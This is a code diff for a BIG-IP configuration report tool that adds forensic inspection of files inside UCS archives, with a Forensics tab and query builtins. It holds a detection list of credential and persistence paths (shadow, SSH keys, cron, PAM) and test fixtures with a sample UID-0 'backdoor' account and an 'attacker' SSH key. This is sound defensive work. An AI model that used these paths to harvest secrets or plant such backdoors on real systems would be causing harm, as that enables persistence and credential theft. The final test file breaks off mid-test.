+        .map_err(|e| JsError::new(&e.to_string()))?;
+
+    let mut out: Vec<serde_json::Value> = Vec::with_capacity(entries.len());
+    for e in entries {
+        // Read content for small text files only; the Forensics shaper drops
+        // sensitive bodies (shadow / private keys) before they reach the DOM.
+        let content = if e.is_text && e.size <= MAX_FORENSIC_CONTENT {
+            read_ucs_member(bytes, &e.path, &provider, name)
+                .ok()
+                .map(|b| String::from_utf8_lossy(&b).into_owned())
+        } else {
+            None
+        };
+        out.push(serde_json::json!({
+            "path": e.path,
+            "size": e.size,
+            "sha256": e.sha256,
+            "isText": e.is_text,
+            "content": content,
+        }));
+    }
+    serde_json::to_string(&out).map_err(|e| JsError::new(&e.to_string()))
+}
+
 /// Count the `f5mku` `$M$…` encrypted secrets in an SCF source.
 ///
 /// The page uses this to decide whether to ask for a master key at all — the
@@ -144,6 +204,9 @@ pub fn decrypt_secrets(scf: &str, master_key: &str) -> Result<String, JsError> {
 ///   `{uri: {cache_path: pem}}` — so the certs tab can parse the real
 ///   certificates (issue date, SANs, trust chain) and a filestore `cache-path`
 ///   shared across two devices doesn't collide. `"{}"` for none.
+/// * `files_json` — a JSON object `{uri: [{path, size, sha256, isText,
+///   content?}]}` from each file's [`extract_files`], powering the Forensics
+///   tab. `"{}"` for none.
 /// * `title` — the report title.
 /// * `generated_at` — a generation timestamp string (the caller stamps it with
 ///   the browser's local clock; the engine itself is time-free).
@@ -154,6 +217,7 @@ pub fn decrypt_secrets(scf: &str, master_key: &str) -> Result<String, JsError> {
 pub fn generate_report(
     sources_json: &str,
     cert_files_json: &str,
+    files_json: &str,
     title: &str,
     generated_at: &str,
     embed_console: bool,
@@ -170,11 +234,19 @@ pub fn generate_report(
             serde_json::from_str(cert_files_json)
                 .map_err(|e| JsError::new(&format!("invalid cert-files JSON: {e}")))?
         };
+    let files: std::collections::HashMap<String, Vec<serde_json::Value>> =
+        if files_json.trim().is_empty() {
+            std::collections::HashMap::new()
+        } else {
+            serde_json::from_str(files_json)
+                .map_err(|e| JsError::new(&format!("invalid files JSON: {e}")))?
+        };
     let opts = RenderOptions {
         title: title.to_owned(),
         generated_at: generated_at.to_owned(),
         embed_console,
         cert_pems,
+        files,
     };
     build_report(&sources, &opts).map_err(|e| JsError::new(&e.to_string()))
 }

--- a/rust/bigip-report-wasm/src/lib.rs
+++ b/rust/bigip-report-wasm/src/lib.rs
@@ -140,8 +140,10 @@ pub fn decrypt_secrets(scf: &str, master_key: &str) -> Result<String, JsError> {
 /// * `sources_json` — an ordered JSON array of `[uri, scf_text]` pairs (each
 ///   `uri` a display name, each `scf_text` the output of [`extract_source`]).
 /// * `cert_files_json` — a JSON object `{cache_path: pem}` merged from every
-///   file's [`extract_cert_files`], so the certs tab can parse the real
-///   certificates (issue date, SANs, trust chain). `"{}"` for none.
+///   file's [`extract_cert_files`], nested **by source URI** —
+///   `{uri: {cache_path: pem}}` — so the certs tab can parse the real
+///   certificates (issue date, SANs, trust chain) and a filestore `cache-path`
+///   shared across two devices doesn't collide. `"{}"` for none.
 /// * `title` — the report title.
 /// * `generated_at` — a generation timestamp string (the caller stamps it with
 ///   the browser's local clock; the engine itself is time-free).
@@ -161,7 +163,7 @@ pub fn generate_report(
     if sources.is_empty() {
         return Err(JsError::new("no config sources provided"));
     }
-    let cert_pems: std::collections::HashMap<String, String> =
+    let cert_pems: std::collections::HashMap<String, std::collections::HashMap<String, String>> =
         if cert_files_json.trim().is_empty() {
             std::collections::HashMap::new()
         } else {

--- a/rust/bigip-report-wasm/www/index.html
+++ b/rust/bigip-report-wasm/www/index.html
@@ -351,16 +351,18 @@
     }));
   }
 
-  // Merge every file's filestore certificates into one {cache_path: pem} map.
+  // Each file's filestore certificates, nested by source name:
+  // {name: {cache_path: pem}}. Keeping them per-source stops two devices that
+  // share a filestore cache-path from clobbering each other's certificate.
   function collectCertFiles(items, pass) {
-    var merged = {};
+    var bySource = {};
     items.forEach(function (it) {
       try {
-        var m = JSON.parse(wasm_bindgen.extract_cert_files(it.name, it.bytes, pass, it.scf));
-        Object.keys(m).forEach(function (k) { merged[k] = m[k]; });
+        bySource[it.name] = JSON.parse(
+          wasm_bindgen.extract_cert_files(it.name, it.bytes, pass, it.scf));
       } catch (e) { /* best effort — fall back to config metadata */ }
     });
-    return merged;
+    return bySource;
   }
 
   // Best-effort probe (on file / passphrase change): reveal the master-key

--- a/rust/bigip-report-wasm/www/index.html
+++ b/rust/bigip-report-wasm/www/index.html
@@ -365,6 +365,19 @@
     return bySource;
   }
 
+  // Each file's forensic UCS inventory, nested by source name:
+  // {name: [{path, size, sha256, isText, content?}]}. Powers the Forensics tab.
+  function collectForensicFiles(items, pass) {
+    var bySource = {};
+    items.forEach(function (it) {
+      try {
+        bySource[it.name] = JSON.parse(
+          wasm_bindgen.extract_files(it.name, it.bytes, pass));
+      } catch (e) { /* best effort — no forensic view for this source */ }
+    });
+    return bySource;
+  }
+
   // Best-effort probe (on file / passphrase change): reveal the master-key
   // field only if the config actually carries $M$ secrets. Silent on failure
   // (e.g. an encrypted UCS whose passphrase isn't entered yet).
@@ -390,6 +403,8 @@
       // Certificates come straight from the archive filestore (not affected by
       // the f5mku secret decryption below).
       var certFiles = collectCertFiles(items, pass);
+      // Forensic file inventory, also straight from the archive.
+      var forensicFiles = collectForensicFiles(items, pass);
 
       // Decrypt with the master key when one was supplied.
       if (mku && secretTotal > 0) {
@@ -406,11 +421,12 @@
       var locked = secretTotal > 0 && !mku;
       var sources = items.map(function (s) { return [s.name, s.scf]; });
       return new Promise(function (resolve) {
-        setTimeout(function () { resolve({ sources: sources, certFiles: certFiles, locked: locked }); }, 20);
+        setTimeout(function () { resolve({ sources: sources, certFiles: certFiles, forensicFiles: forensicFiles, locked: locked }); }, 20);
       });
     }).then(function (st) {
       var html = wasm_bindgen.generate_report(
-        JSON.stringify(st.sources), JSON.stringify(st.certFiles), title, utcStamp(), embed);
+        JSON.stringify(st.sources), JSON.stringify(st.certFiles), JSON.stringify(st.forensicFiles),
+        title, utcStamp(), embed);
       deliver(html, st.sources.length, st.locked);
     });
   }

--- a/rust/f5-cli/src/commands/query.rs
+++ b/rust/f5-cli/src/commands/query.rs
@@ -116,6 +116,58 @@ fn make_ucs_cert_reader() -> tcl_bigip_query::eval::UcsCertReader {
     )
 }
 
+/// Build the `files` / `file` / `glob` / `grep` reader the query engine injects:
+/// enumerate a source's forensic UCS members (metadata) or read one member's
+/// content, decrypting the archive as needed with the shared passphrase.
+fn make_files_reader() -> tcl_bigip_query::eval::FilesReader {
+    use tcl_bigip_io::{MemberScope, list_ucs_members};
+    use tcl_bigip_query::eval::FileOp;
+
+    let opts = crate::cli::PassphraseArgs::default().to_options();
+    std::rc::Rc::new(
+        move |config_uri: &str, op: &FileOp| -> Result<Value, QueryError> {
+            let path = ucs_uri_to_path(config_uri).ok_or_else(|| {
+                QueryError::builtin(format!(
+                    "files: source {config_uri} is not a local file-backed UCS"
+                ))
+            })?;
+            let raw = std::fs::read(&path)
+                .map_err(|e| QueryError::builtin(format!("files: cannot read UCS {path}: {e}")))?;
+            let provider = || resolve_passphrase(&opts);
+            match op {
+                FileOp::Inventory => {
+                    let entries = list_ucs_members(&raw, &provider, &path, MemberScope::Forensic)
+                        .map_err(|e| {
+                            QueryError::builtin(format!(
+                                "files: {path}: {e} \
+                                 (a plain bigip.conf is not an archive — read the UCS itself)"
+                            ))
+                        })?;
+                    let list = entries
+                        .into_iter()
+                        .map(|e| {
+                            Value::object([
+                                ("path".to_owned(), Value::Str(e.path)),
+                                (
+                                    "size".to_owned(),
+                                    Value::Int(i64::try_from(e.size).unwrap_or(i64::MAX)),
+                                ),
+                                ("sha256".to_owned(), Value::Str(e.sha256)),
+                                ("is_text".to_owned(), Value::Bool(e.is_text)),
+                            ])
+                        })
+                        .collect();
+                    Ok(Value::List(list))
+                }
+                FileOp::Content(member) => match read_ucs_member(&raw, member, &provider, &path) {
+                    Ok(bytes) => Ok(Value::Str(String::from_utf8_lossy(&bytes).into_owned())),
+                    Err(_) => Ok(Value::Null),
+                },
+            }
+        },
+    )
+}
+
 /// Whether *path*'s extension is `.ucs` (case-insensitive).
 fn has_ucs_suffix(path: &str) -> bool {
     Path::new(path)
@@ -801,6 +853,9 @@ pub fn run_query_verb(
         // inject a reader using the same passphrase resolution the input
         // loader uses.
         ucs_cert_reader: Some(make_ucs_cert_reader()),
+        // `files` / `file` / `glob` / `grep` read the OS files inside a UCS;
+        // inject a reader over the same passphrase resolution.
+        files_reader: Some(make_files_reader()),
         merge: flags.merge,
     };
 

--- a/rust/tcl-bigip-io/src/lib.rs
+++ b/rust/tcl-bigip-io/src/lib.rs
@@ -29,6 +29,7 @@ pub use paths::{
     LoadedConfig, PassphraseOptions, PathError, load_paths, read_path, resolve_passphrase,
 };
 pub use ucs::{
-    DEFAULT_PASSPHRASE_ENV, PassphraseProvider, UcsError, decrypt_if_encrypted, is_pgp_bytes,
-    is_ucs_bytes, read_ucs_member, ucs_archive_to_scf, ucs_to_scf,
+    DEFAULT_PASSPHRASE_ENV, MemberScope, PassphraseProvider, UcsError, UcsFileEntry,
+    decrypt_if_encrypted, is_pgp_bytes, is_ucs_bytes, list_ucs_members, read_ucs_member,
+    ucs_archive_to_scf, ucs_to_scf,
 };

--- a/rust/tcl-bigip-io/src/ucs.rs
+++ b/rust/tcl-bigip-io/src/ucs.rs
@@ -381,6 +381,137 @@ pub fn read_ucs_member(
     }
 }
 
+/// Which members [`list_ucs_members`] returns.
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+pub enum MemberScope {
+    /// Only forensically-relevant members — the OS files an attacker tampers
+    /// with for persistence, credential theft or log evasion (see
+    /// [`is_forensic_path`]). The default for the report's forensic view.
+    Forensic,
+    /// Every regular-file member (macOS cruft already stripped). The full
+    /// archive tree, for deep inspection.
+    FullTree,
+}
+
+/// Metadata for one UCS member. Content is fetched separately (via
+/// [`read_ucs_member`]) so an inventory stays light — a UCS can hold hundreds
+/// of megabytes across thousands of members.
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub struct UcsFileEntry {
+    /// Archive path, leading `./` / `/` stripped (e.g. `etc/passwd`).
+    pub path: String,
+    /// Uncompressed size in bytes.
+    pub size: u64,
+    /// Lowercase hex SHA-256 of the member's content — lets a reviewer diff a
+    /// file against a known-good hash without shipping the bytes.
+    pub sha256: String,
+    /// Whether the content decodes as UTF-8 with no NUL bytes (i.e. safe to
+    /// show as text rather than a binary blob).
+    pub is_text: bool,
+}
+
+/// Lowercase hex SHA-256 of `bytes`.
+fn sha256_hex(bytes: &[u8]) -> String {
+    use sha2::{Digest, Sha256};
+    let digest = Sha256::digest(bytes);
+    let mut out = String::with_capacity(digest.len() * 2);
+    for b in digest {
+        use std::fmt::Write as _;
+        let _ = write!(out, "{b:02x}");
+    }
+    out
+}
+
+/// Heuristic: is this content safe to display as text? Valid UTF-8 with no NUL
+/// byte. Cheap and good enough to separate config / dotfiles / keys from binary
+/// blobs (databases, certs' DER, images).
+fn is_text_bytes(bytes: &[u8]) -> bool {
+    !bytes.contains(&0) && std::str::from_utf8(bytes).is_ok()
+}
+
+/// Is `name` a forensically-relevant UCS path?
+///
+/// These are the OS files outside `/config` that attackers modify on a
+/// compromised BIG-IP — the same set the report's UCS forensic checklist maps
+/// to MITRE ATT&CK: login-persistence dotfiles and SSH keys, the local account
+/// databases, external-auth and PAM config, logging config, and cron. `name`
+/// is expected already stripped of a leading `./` / `/` (as [`read_members`]
+/// returns it). `bigip*.conf` is intentionally excluded — it is already
+/// surfaced as the SCF config, not a forensic artefact.
+fn is_forensic_path(name: &str) -> bool {
+    // Directory subtrees commonly tampered with (prefix match).
+    const FORENSIC_PREFIXES: &[&str] = &[
+        "etc/cron",       // crontab + cron.d / cron.daily / …
+        "etc/syslog-ng/", // T1562.006 logging evasion
+        "etc/ssh/",       // sshd_config
+        "etc/openldap/",  // T1556 external auth
+        "etc/pam.d/",
+        "etc/security/",
+    ];
+    // Individual files commonly tampered with (exact match).
+    const FORENSIC_EXACT: &[&str] = &[
+        "etc/passwd",
+        "etc/shadow",
+        "etc/group",
+        "etc/gshadow",
+        "etc/hosts",
+        "etc/hosts.deny",
+        "etc/hosts.allow",
+        "etc/nsswitch.conf",
+        "etc/krb5.conf",
+        "etc/resolv.conf",
+        "etc/ldap.conf",
+        "etc/motd",
+        "etc/issue",
+    ];
+
+    // SSH material anywhere (authorized_keys, id_*, known_hosts, config) —
+    // T1098.004 SSH-key persistence.
+    if name.contains("/.ssh/") || name.starts_with(".ssh/") {
+        return true;
+    }
+    // Shell / user dotfiles under a home directory — T1546.004 login hooks.
+    let dotfile = (name.starts_with("home/") || name.starts_with("root/"))
+        && name.rsplit('/').next().is_some_and(|base| base.starts_with('.'));
+
+    dotfile
+        || FORENSIC_EXACT.contains(&name)
+        || FORENSIC_PREFIXES.iter().any(|p| name.starts_with(p))
+}
+
+/// List the members of a UCS archive with per-file metadata (path, size,
+/// SHA-256, text/binary), decrypting first when the archive is encrypted.
+///
+/// `scope` selects the whole tree or just the forensically-relevant subset
+/// ([`is_forensic_path`]). Content is not returned — fetch a single member's
+/// bytes on demand with [`read_ucs_member`]. Everything happens in memory, so a
+/// UCS's secrets never touch disk.
+pub fn list_ucs_members(
+    raw: &[u8],
+    provider: &PassphraseProvider<'_>,
+    label: &str,
+    scope: MemberScope,
+) -> Result<Vec<UcsFileEntry>, UcsError> {
+    let data = decrypt_if_encrypted(raw, provider, label)?;
+    if !is_ucs_bytes(&data) {
+        return Err(UcsError::new(format!("{label}: not a valid UCS archive")));
+    }
+    let members = read_members(&data)?;
+    let mut out = Vec::new();
+    for (name, bytes) in &members {
+        if matches!(scope, MemberScope::Forensic) && !is_forensic_path(name) {
+            continue;
+        }
+        out.push(UcsFileEntry {
+            path: name.clone(),
+            size: bytes.len() as u64,
+            sha256: sha256_hex(bytes),
+            is_text: is_text_bytes(bytes),
+        });
+    }
+    Ok(out)
+}
+
 #[cfg(test)]
 mod tests {
     use super::*;
@@ -485,5 +616,88 @@ mod tests {
         assert!(!scf.contains("garbage"), "AppleDouble body excluded:\n{scf}");
         assert!(!scf.contains("applefork"));
         assert!(!scf.contains("more binary"));
+    }
+
+    #[test]
+    fn forensic_path_classification() {
+        // Forensic artefacts.
+        for p in [
+            "etc/passwd",
+            "etc/shadow",
+            "etc/hosts.deny",
+            "etc/nsswitch.conf",
+            "etc/krb5.conf",
+            "etc/motd",
+            "etc/syslog-ng/syslog-ng.conf",
+            "etc/openldap/ldap.conf",
+            "etc/security/limits.conf",
+            "etc/pam.d/sshd",
+            "etc/crontab",
+            "etc/cron.d/job",
+            "root/.ssh/authorized_keys",
+            "home/admin/.ssh/id_rsa",
+            "home/admin/.bashrc",
+            "root/.bash_history",
+        ] {
+            assert!(is_forensic_path(p), "{p} should be forensic");
+        }
+        // Not forensic — config (already the SCF) and ordinary runtime data.
+        for p in [
+            "config/bigip.conf",
+            "config/bigip_base.conf",
+            "var/lib/hsqldb/db.data",
+            "SPEC-Manifest",
+            "etc/hostname",
+        ] {
+            assert!(!is_forensic_path(p), "{p} should not be forensic");
+        }
+    }
+
+    #[test]
+    fn list_members_forensic_vs_full_tree() {
+        use std::collections::BTreeSet;
+        let ucs = build_ucs(&[
+            ("config/bigip.conf", "ltm pool /Common/p { }"),
+            ("etc/passwd", "root:x:0:0::/root:/bin/bash\n"),
+            ("root/.ssh/authorized_keys", "ssh-rsa AAAAB3Nz attacker\n"),
+            ("home/admin/.bashrc", "echo hi\n"),
+            ("etc/motd", "welcome\n"),
+            // A binary blob (embedded NUL) that must classify as non-text and
+            // must NOT appear in the forensic subset.
+            ("var/lib/hsqldb/db.data", "rows\u{0}\u{1}\u{2}binary"),
+        ]);
+        // Plain UCS: the provider is never consulted.
+        let provider = || Ok(String::new());
+
+        let all = list_ucs_members(&ucs, &provider, "t", MemberScope::FullTree).unwrap();
+        assert_eq!(all.len(), 6, "full tree returns every member");
+
+        let forensic = list_ucs_members(&ucs, &provider, "t", MemberScope::Forensic).unwrap();
+        let paths: BTreeSet<&str> = forensic.iter().map(|e| e.path.as_str()).collect();
+        assert_eq!(
+            paths,
+            BTreeSet::from([
+                "etc/passwd",
+                "root/.ssh/authorized_keys",
+                "home/admin/.bashrc",
+                "etc/motd",
+            ]),
+            "forensic subset excludes config + runtime data"
+        );
+
+        // Metadata: size, text/binary and a stable, correct SHA-256.
+        let passwd = forensic.iter().find(|e| e.path == "etc/passwd").unwrap();
+        assert_eq!(passwd.size, "root:x:0:0::/root:/bin/bash\n".len() as u64);
+        assert!(passwd.is_text);
+        // sha256("root:x:0:0::/root:/bin/bash\n") — independently reproducible.
+        assert_eq!(
+            passwd.sha256,
+            sha256_hex(b"root:x:0:0::/root:/bin/bash\n"),
+            "sha256 is lowercase hex of the content"
+        );
+        assert_eq!(passwd.sha256.len(), 64);
+
+        let blob = all.iter().find(|e| e.path == "var/lib/hsqldb/db.data").unwrap();
+        assert!(!blob.is_text, "NUL-bearing content is binary");
     }
 }

--- a/rust/tcl-bigip-query/src/builtins/files.rs
+++ b/rust/tcl-bigip-query/src/builtins/files.rs
@@ -1,0 +1,190 @@
+//! Forensic file builtins: `files`, `file`, `glob`, `grep`.
+//!
+//! These read the OS files inside the current source's UCS archive through the
+//! [`crate::eval::FilesReader`] hook (injected by the f5 CLI; absent in the
+//! in-browser console, where they error clearly). Each returns file objects
+//! `{path, size, sha256, is_text, content?}` whose fields are ordinary `.field`
+//! navigation — so `file("etc/passwd").content` and `glob("home/*/.ssh/*").path`
+//! just work. The inventory is scoped to the forensically-relevant members (the
+//! same set the report's Forensics tab uses).
+
+use indexmap::IndexMap;
+
+use crate::errors::QueryError;
+use crate::eval::{EvalContext, FileOp, FilesReader};
+use crate::value::Value;
+
+use super::{BuiltinSpec, as_str, ctx};
+
+/// The reader hook for the current context, or a clear error when unwired.
+fn reader(ctx: &EvalContext, who: &str) -> Result<FilesReader, QueryError> {
+    ctx.files_reader.clone().ok_or_else(|| {
+        QueryError::builtin(format!(
+            "{who}: no UCS file reader is wired in this context — run it through \
+             the f5 CLI against a .ucs archive"
+        ))
+    })
+}
+
+/// The current source's forensic member inventory (metadata, no content).
+fn inventory(ctx: &EvalContext, who: &str) -> Result<Vec<Value>, QueryError> {
+    let uri = ctx.root.uri.clone();
+    let read = reader(ctx, who)?;
+    match read(&uri, &FileOp::Inventory)? {
+        Value::List(v) | Value::Stream(v) => Ok(v),
+        other => Err(QueryError::builtin(format!(
+            "{who}: file reader returned {} (expected a list)",
+            other.type_name()
+        ))),
+    }
+}
+
+/// Read one member's content, `None` when the reader has none (binary / absent).
+fn read_content(ctx: &EvalContext, who: &str, path: &str) -> Result<Option<String>, QueryError> {
+    let uri = ctx.root.uri.clone();
+    let read = reader(ctx, who)?;
+    match read(&uri, &FileOp::Content(path.to_owned()))? {
+        Value::Str(s) => Ok(Some(s)),
+        Value::Null => Ok(None),
+        other => Err(QueryError::builtin(format!(
+            "{who}: content reader returned {} (expected a string)",
+            other.type_name()
+        ))),
+    }
+}
+
+fn path_of(v: &Value) -> Option<&str> {
+    match v {
+        Value::Object(m) => match m.get("path") {
+            Some(Value::Str(s)) => Some(s.as_str()),
+            _ => None,
+        },
+        _ => None,
+    }
+}
+
+fn is_text(v: &Value) -> bool {
+    matches!(v, Value::Object(m) if matches!(m.get("is_text"), Some(Value::Bool(true))))
+}
+
+/// Minimal shell-style glob → regex: `*` matches any run, `?` one character;
+/// everything else is literal. Matched against the whole path.
+fn glob_match(pattern: &str, text: &str) -> bool {
+    let mut re = String::with_capacity(pattern.len() + 8);
+    re.push('^');
+    for ch in pattern.chars() {
+        match ch {
+            '*' => re.push_str(".*"),
+            '?' => re.push('.'),
+            c if r".+()|[]{}^$\".contains(c) => {
+                re.push('\\');
+                re.push(c);
+            }
+            c => re.push(c),
+        }
+    }
+    re.push('$');
+    regex::Regex::new(&re).is_ok_and(|r| r.is_match(text))
+}
+
+/// `files` — the forensic member inventory (`path` / `size` / `sha256` / `is_text`).
+fn bi_files(_args: &[Value], ctx: &mut EvalContext) -> Result<Value, QueryError> {
+    Ok(Value::List(inventory(ctx, "files")?))
+}
+
+/// `glob(pattern)` — inventory entries whose path matches a shell glob.
+fn bi_glob(args: &[Value], ctx: &mut EvalContext) -> Result<Value, QueryError> {
+    let pat = as_str(&args[0], "glob", 1)?;
+    let inv = inventory(ctx, "glob")?;
+    Ok(Value::List(
+        inv.into_iter()
+            .filter(|f| path_of(f).is_some_and(|p| glob_match(&pat, p)))
+            .collect(),
+    ))
+}
+
+/// `file(path)` — one member by exact path, with `content` attached for text
+/// files (`null` for binary / missing / sensitive). Returns `null` if absent.
+fn bi_file(args: &[Value], ctx: &mut EvalContext) -> Result<Value, QueryError> {
+    let want = as_str(&args[0], "file", 1)?;
+    let inv = inventory(ctx, "file")?;
+    let Some(entry) = inv.into_iter().find(|f| path_of(f) == Some(want.as_str())) else {
+        return Ok(Value::Null);
+    };
+    let text = is_text(&entry);
+    let mut m = match entry {
+        Value::Object(m) => m,
+        _ => IndexMap::new(),
+    };
+    let content = if text {
+        read_content(ctx, "file", &want)?.map_or(Value::Null, Value::Str)
+    } else {
+        Value::Null
+    };
+    m.insert("content".into(), content);
+    Ok(Value::Object(m))
+}
+
+/// `grep(pattern[, path_glob])` — regex-search text members (optionally
+/// glob-scoped), returning `{path, line, text}` rows for each match.
+fn bi_grep(args: &[Value], ctx: &mut EvalContext) -> Result<Value, QueryError> {
+    let pattern = as_str(&args[0], "grep", 1)?;
+    let re = regex::Regex::new(&pattern)
+        .map_err(|e| QueryError::builtin(format!("grep: invalid regex: {e}")))?;
+    let path_glob = match args.get(1) {
+        Some(v) => Some(as_str(v, "grep", 2)?),
+        None => None,
+    };
+    let inv = inventory(ctx, "grep")?;
+    let mut hits: Vec<Value> = Vec::new();
+    for f in &inv {
+        let Some(p) = path_of(f) else { continue };
+        if !is_text(f) {
+            continue;
+        }
+        if let Some(g) = &path_glob
+            && !glob_match(g, p)
+        {
+            continue;
+        }
+        let Some(content) = read_content(ctx, "grep", p)? else {
+            continue;
+        };
+        for (i, line) in content.lines().enumerate() {
+            if re.is_match(line) {
+                let mut row = IndexMap::new();
+                row.insert("path".into(), Value::Str(p.to_owned()));
+                row.insert("line".into(), Value::Int(i64::try_from(i + 1).unwrap_or(i64::MAX)));
+                row.insert("text".into(), Value::Str(line.to_owned()));
+                hits.push(Value::Object(row));
+            }
+        }
+    }
+    Ok(Value::List(hits))
+}
+
+pub(crate) fn registrations() -> Vec<(&'static str, BuiltinSpec)> {
+    vec![
+        ctx("files", "forensic", 0, Some(0), bi_files),
+        ctx("glob", "forensic", 1, Some(1), bi_glob),
+        ctx("file", "forensic", 1, Some(1), bi_file),
+        ctx("grep", "forensic", 1, Some(2), bi_grep),
+    ]
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn glob_matching() {
+        assert!(glob_match("home/*/.ssh/*", "home/admin/.ssh/authorized_keys"));
+        assert!(glob_match("etc/*.conf", "etc/syslog-ng.conf"));
+        assert!(!glob_match("etc/*.conf", "etc/passwd"));
+        assert!(glob_match("etc/passwd", "etc/passwd"));
+        assert!(glob_match("root/.??shrc", "root/.bashrc"));
+        // Regex metacharacters in the pattern are literal.
+        assert!(glob_match("a.b", "a.b"));
+        assert!(!glob_match("a.b", "axb"));
+    }
+}

--- a/rust/tcl-bigip-query/src/builtins/mod.rs
+++ b/rust/tcl-bigip-query/src/builtins/mod.rs
@@ -36,6 +36,7 @@ mod encoding;
 pub(crate) use encoding::json_to_value;
 mod extras;
 pub mod f5profile;
+mod files;
 mod graph;
 mod math;
 mod net;
@@ -324,6 +325,7 @@ fn registrations() -> Vec<(&'static str, BuiltinSpec)> {
     r.extend(rename::registrations());
     r.extend(extras::registrations());
     r.extend(f5profile::registrations());
+    r.extend(files::registrations());
     #[cfg(feature = "probes")]
     r.extend(crate::probes::registrations());
     r.extend(crate::special::registrations());

--- a/rust/tcl-bigip-query/src/eval.rs
+++ b/rust/tcl-bigip-query/src/eval.rs
@@ -140,6 +140,22 @@ pub fn root_container(root: &Rc<Root>) -> Value {
 /// means "not wired", and `ucs_cert` raises a clear error.
 pub type UcsCertReader = Rc<dyn Fn(&str, &str) -> Result<Value, QueryError>>;
 
+/// A file operation the DSL's forensic file builtins ask a [`FilesReader`] to
+/// perform against a source's UCS archive.
+pub enum FileOp {
+    /// List the archive's forensic members with metadata (`path`, `size`,
+    /// `sha256`, `is_text`) and no content — a light inventory.
+    Inventory,
+    /// Read one member's content as a UTF-8-lossy string.
+    Content(String),
+}
+
+/// Reader hook for the `files` / `file` / `glob` / `grep` builtins: given a
+/// source `config_uri` and a [`FileOp`], returns the requested [`Value`]. The
+/// CLI injects this (it holds the archive bytes); `None` means "not wired"
+/// (e.g. the in-browser console), and the file builtins raise a clear error.
+pub type FilesReader = Rc<dyn Fn(&str, &FileOp) -> Result<Value, QueryError>>;
+
 /// Evaluation context.
 pub struct EvalContext {
     pub root: Rc<Root>,
@@ -167,6 +183,9 @@ pub struct EvalContext {
     /// Reader hook for `ucs_cert`. `None` means
     /// no reader is wired (e.g. when driven outside the f5 CLI).
     pub ucs_cert_reader: Option<UcsCertReader>,
+    /// Reader hook for the forensic `files` / `file` / `glob` / `grep`
+    /// builtins. `None` means no reader is wired (e.g. the in-browser console).
+    pub files_reader: Option<FilesReader>,
     /// Lazily built merged reference graph spanning every [`merge_roots`]
     /// entry — built on first graph-builtin call in merge mode and memoised
     /// for the duration of the statement so cross-file `refs` /
@@ -226,6 +245,7 @@ impl EvalContext {
             probes_enabled: false,
             ca_bundle: None,
             ucs_cert_reader: None,
+            files_reader: None,
             merge_graph: RefCell::new(None),
         }
     }

--- a/rust/tcl-bigip-query/src/runner.rs
+++ b/rust/tcl-bigip-query/src/runner.rs
@@ -65,6 +65,9 @@ pub struct QueryOptions {
     /// `ucs_cert` reader hook (the CLI injects a UCS-aware reader). Threaded
     /// onto [`EvalContext::ucs_cert_reader`].
     pub ucs_cert_reader: Option<crate::eval::UcsCertReader>,
+    /// `files` / `file` / `glob` / `grep` reader hook (the CLI injects a
+    /// UCS-aware reader). Threaded onto [`EvalContext::files_reader`].
+    pub files_reader: Option<crate::eval::FilesReader>,
     /// Treat every loaded config as one logical namespace (`--merge`). When
     /// `true`, the query runs once over every source (concatenating each
     /// root's projection), `refs` / `referenced_by` walk references across
@@ -82,6 +85,7 @@ impl std::fmt::Debug for QueryOptions {
             .field("enable_probes", &self.enable_probes)
             .field("ca_bundle", &self.ca_bundle)
             .field("ucs_cert_reader", &self.ucs_cert_reader.is_some())
+            .field("files_reader", &self.files_reader.is_some())
             .field("merge", &self.merge)
             .finish()
     }
@@ -271,6 +275,7 @@ pub fn run_query(
                 probes_enabled: opts.enable_probes,
                 ca_bundle: opts.ca_bundle.clone(),
                 ucs_cert_reader: opts.ucs_cert_reader.clone(),
+                files_reader: opts.files_reader.clone(),
                 merge_graph: std::cell::RefCell::new(None),
             };
             accumulated_values.extend(evaluate_statement(stmt, &mut ctx)?);
@@ -621,6 +626,7 @@ fn eval_merge_statement(
             probes_enabled: opts.enable_probes,
             ca_bundle: opts.ca_bundle.clone(),
             ucs_cert_reader: opts.ucs_cert_reader.clone(),
+            files_reader: opts.files_reader.clone(),
             merge_graph: std::cell::RefCell::new(None),
         };
         accumulated_values.extend(evaluate_statement(stmt, &mut ctx)?);

--- a/rust/tcl-bigip-query/tests/files.rs
+++ b/rust/tcl-bigip-query/tests/files.rs
@@ -1,0 +1,92 @@
+//! Engine-level tests for the forensic file builtins (`files` / `file` /
+//! `glob` / `grep`) driven through `run_query` with a stub `files_reader`, so
+//! the DSL surface is exercised without a real UCS archive.
+
+use std::rc::Rc;
+
+use tcl_bigip_query::eval::{FileOp, FilesReader};
+use tcl_bigip_query::value::Value;
+use tcl_bigip_query::{QueryOptions, run_query};
+
+fn sources() -> Vec<(String, String)> {
+    vec![("file:///dev.ucs".to_owned(), "ltm pool /Common/p { }\n".to_owned())]
+}
+
+fn stub_reader() -> FilesReader {
+    Rc::new(|_uri: &str, op: &FileOp| match op {
+        FileOp::Inventory => Ok(Value::List(vec![
+            Value::object([
+                ("path".to_owned(), Value::Str("etc/passwd".to_owned())),
+                ("size".to_owned(), Value::Int(60)),
+                ("sha256".to_owned(), Value::Str("aa".to_owned())),
+                ("is_text".to_owned(), Value::Bool(true)),
+            ]),
+            Value::object([
+                ("path".to_owned(), Value::Str("root/.ssh/authorized_keys".to_owned())),
+                ("size".to_owned(), Value::Int(40)),
+                ("sha256".to_owned(), Value::Str("bb".to_owned())),
+                ("is_text".to_owned(), Value::Bool(true)),
+            ]),
+        ])),
+        FileOp::Content(p) => Ok(match p.as_str() {
+            "etc/passwd" => Value::Str(
+                "root:x:0:0::/root:/bin/bash\nbackdoor:x:0:0::/root:/bin/bash\n".to_owned(),
+            ),
+            "root/.ssh/authorized_keys" => Value::Str("ssh-rsa AAAA attacker\n".to_owned()),
+            _ => Value::Null,
+        }),
+    })
+}
+
+fn opts() -> QueryOptions {
+    QueryOptions {
+        files_reader: Some(stub_reader()),
+        ..QueryOptions::default()
+    }
+}
+
+fn run(q: &str) -> String {
+    let r = run_query(q, &sources(), &opts()).expect("run");
+    let vals = r.values_per_file[0].1.clone();
+    tcl_bigip_query::jsonfmt::to_pretty(&Value::List(vals))
+}
+
+#[test]
+fn files_lists_the_inventory() {
+    let out = run("files");
+    assert!(
+        out.contains("etc/passwd") && out.contains("authorized_keys"),
+        "inventory listed: {out}"
+    );
+}
+
+#[test]
+fn glob_filters_by_path() {
+    let out = run(r#"glob("root/.ssh/*")"#);
